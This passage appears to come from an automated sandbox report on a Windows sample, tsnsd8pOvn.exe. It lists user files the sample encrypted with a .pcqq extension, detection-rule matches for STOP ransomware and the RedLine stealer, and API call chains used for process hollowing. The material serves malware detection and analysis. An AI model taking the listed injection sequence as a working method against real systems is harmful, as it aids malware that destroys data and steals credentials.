        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Comms\UnistoreDB\store.jfm.pcqq (copy) entropy: 7.99143504067
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.pcqq (copy) entropy: 7.9976355692
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.pcqq (copy) entropy: 7.99275184488
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.pcqq (copy) entropy: 7.99736752943
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.pcqq (copy) entropy: 7.99612049432
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.pcqq (copy) entropy: 7.99125522937
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.pcqq (copy) entropy: 7.99189983616
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.pcqq (copy) entropy: 7.99222537094
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.pcqq (copy) entropy: 7.99131924207
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.pcqq (copy) entropy: 7.99291716786
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\cversions.1.db.pcqq (copy) entropy: 7.99006634322
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001c.db.pcqq (copy) entropy: 7.99805481438
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.pcqq (copy) entropy: 7.99802733337
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db.pcqq (copy) entropy: 7.99796305834
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.pcqq (copy) entropy: 7.9931580516
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.pcqq (copy) entropy: 7.99678400715
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html.pcqq (copy) entropy: 7.99813683887
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.pcqq (copy) entropy: 7.99857750415Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1.pcqq (copy) entropy: 7.99780866643Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.pcqq (copy) entropy: 7.99388868447Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl.pcqq (copy) entropy: 7.99706977892Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat.pcqq (copy) entropy: 7.99486152292Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2.pcqq (copy) entropy: 7.99457472683Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.pcqq (copy) entropy: 7.99591413099Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl.pcqq (copy) entropy: 7.99711062743Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl.pcqq (copy) entropy: 7.99748799195Jump to dropped file

        System Summary

        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 2.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 2.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 13.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 13.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 13.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 13.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 8.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 8.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 11.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 11.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 2.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 2.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 8.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 8.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 7.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 7.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 7.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 7.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 11.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 11.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 0000000A.00000002.2339633794.0000000002147000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
        Source: 00000005.00000002.2213957997.0000000002164000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
        Source: 00000006.00000002.2240762289.0000000002088000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
        Source: 00000000.00000002.2147222942.0000000002178000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
        Source: 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 0000000C.00000002.2413321844.000000000067E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
        Source: 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects STOP ransomware, Author: ditekSHen
        Source: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 5000, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 972, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6628, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 3180, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 416, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6408, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 1208, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6292, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 6956, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: Process Memory Space: tsnsd8pOvn.exe PID: 1492, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe, Code function: 0_2_02210110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe, Code function: 5_2_02200110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe, Code function: 6_2_022B0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 00404C80 appears 157 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 004547A0 appears 75 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 004049B0 appears 116 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 02238EC0 appears 57 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 0042F7C0 appears 99 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 02240160 appears 50 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 02228EC0 appears 57 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 0044F23E appears 53 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 00428520 appears 77 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 00454E50 appears 42 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 02230160 appears 50 times
        Source: tsnsd8pOvn.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 2.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 2.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 13.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 13.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 13.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 13.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 8.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 8.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 11.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 11.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
